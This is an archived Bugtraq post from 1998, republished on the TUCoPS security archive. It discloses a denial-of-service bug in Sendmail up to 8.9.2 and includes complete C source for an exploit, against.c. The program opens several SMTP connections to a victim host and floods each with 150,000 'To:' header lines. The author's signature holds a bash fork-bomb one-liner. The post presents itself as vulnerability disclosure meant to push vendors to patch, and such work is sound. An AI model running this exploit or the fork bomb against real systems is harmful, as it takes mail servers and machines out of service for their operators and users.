Visit our newest sister site!
Hundreds of free aircraft flight manuals
Civilian • Historical • Military • Declassified • FREE!


TUCoPS :: Unix :: General :: sendma.txt

Denial of service attack in Sendmail 8.9.2 with exploit.





[ http://www.rootshell.com/ ]

Date: Sat, 12 Dec 1998 19:39:56 +0100
From: Michal Zalewski <lcamtuf@IDS.PL>
To: BUGTRAQ@netspace.org
Subject: ** Sendmail 8.9.2 DoS - exploit ** get what you want!

Hello again. Yesterday, I published some rather laconic information about
two bugs in Sendmail up to 8.9.2, and decided to post only short description
of problem + suggested patch (instead of exploit), to give developers a
chance. Unfortunately, I put together information about two completely
different problems in single posting, and it confuded a lot of people. So,
to kill any senseless discussions - again:

- The first one was 'redirection attack'; I said you could call it 'bug'
  instead of 'feature', but as noone likes anonymous mailbombing,
  network overloading / scanning, it's good to apply sendmail.cf patch
  included in original posting; without it, your relay could be abused in
  many painful ways. And yes, attack has been confirmed with 8.9.2 and
  sendmail.cf from 8.9.2 with relaying enabled. I don't think there's
  anything left to talk about. Dot.

- The second one was DoS attack during headers parsing - and this is
  a bug, *confirmed on 8.9.2*. I included simple patch to source tree.
  Unfortunately, all feedback we received from developers was one-line
  response 'It has been fixed in 8.9.2'. Bullshit (sorry). I decided
  not to publish an exploit, but now I realized there's no chance for
  response from vendors if there's no real danger. So here it is.
  Attached file, against.c, should perform very 'light' attack, only
  for testing purposes. If you noticed increased LA during attack,
  your machine is vunerable. You had enough time to patch your system
  - don't blame me, but vendors. EOF.

_______________________________________________________________________
Michal Zalewski [lcamtuf@ids.pl] [ENSI / marchew] [dione.ids.pl SYSADM]
[http://linux.lepszy.od.kobiety.pl/~lcamtuf/] <=--=> bash$ :(){ :|:&};:
[voice phone: +48 (0) 22 813 25 86] ? [pager (MetroBip): 0 642 222 813]
Iterowac jest rzecza ludzka, wykonywac rekursywnie - boska [P. Deutsch]


-------------------------------------------------------------------------

/*
  against.c - Another Sendmail (and pine ;-) DoS (up to 8.9.2)
  (c) 1999 by <marchew@linux.lepszy.od.kobiety.pl>

  Usage: ./against existing_user_on_victim_host victim_host
  Example: ./against nobody lamers.net

*/

#include <stdio.h>
#include <unistd.h>
#include <sys/param.h>
#include <sys/socket.h>
#include <sys/time.h>
#include <netinet/in.h>
#include <netdb.h>
#include <stdarg.h>
#include <errno.h>
#include <signal.h>
#include <getopt.h>
#include <stdlib.h>
#include <string.h>

#define MAXCONN 5
#define LINES   150000

struct hostent *hp;
struct sockaddr_in s;
int suck,loop,x;

int main(int argc,char* argv[]) {
  
  printf("against.c - another Sendmail DoS (up to 8.9.2)\n");

  if (argc-3) {
    printf("Usage: %s victim_user victim_host\n",argv[0]);
    exit(0);
  }
    
  hp=gethostbyname(argv[2]);
  
  if (!hp) {
    perror("gethostbyname");
    exit(1);
  }

  fprintf(stderr,"Doing mess: ");

  for (;loop<MAXCONN;loop++) if (!(x=fork())) {
    FILE* d;
    bcopy(hp->h_addr,(void*)&s.sin_addr,hp->h_length);
    s.sin_family=hp->h_addrtype;
    s.sin_port=htons(25);
    if ((suck=socket(AF_INET,SOCK_STREAM,0))<0) perror("socket");
    if (connect(suck,(struct sockaddr *)&s,sizeof(s))) perror("connect");
    if (!(d=fdopen(suck,"w"))) { perror("fdopen"); exit(0); }

    usleep(100000);

    fprintf(d,"helo tweety\n");
    fprintf(d,"mail from: tweety@polbox.com\n");
    fprintf(d,"rcpt to: %s@%s\n",argv[1],argv[2]);
    fprintf(d,"data\n");

    usleep(100000);

    for(loop=0;loop<LINES;loop++) {
      if (!(loop%100)) fprintf(stderr,".");
      fprintf(d,"To: x\n");
    }

    fprintf(d,"\n\n\nsomedata\n\n\n");

    fprintf(d,".\n");

    sleep(1);

    fprintf(d,"quit\n");
    fflush(d);

    sleep(100);
    shutdown(suck,2);
    close(suck);
    exit(0);
  }

  waitpid(x,&loop,0);

  fprintf(stderr,"ok\n");

  return 0;
}


TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2014 AOH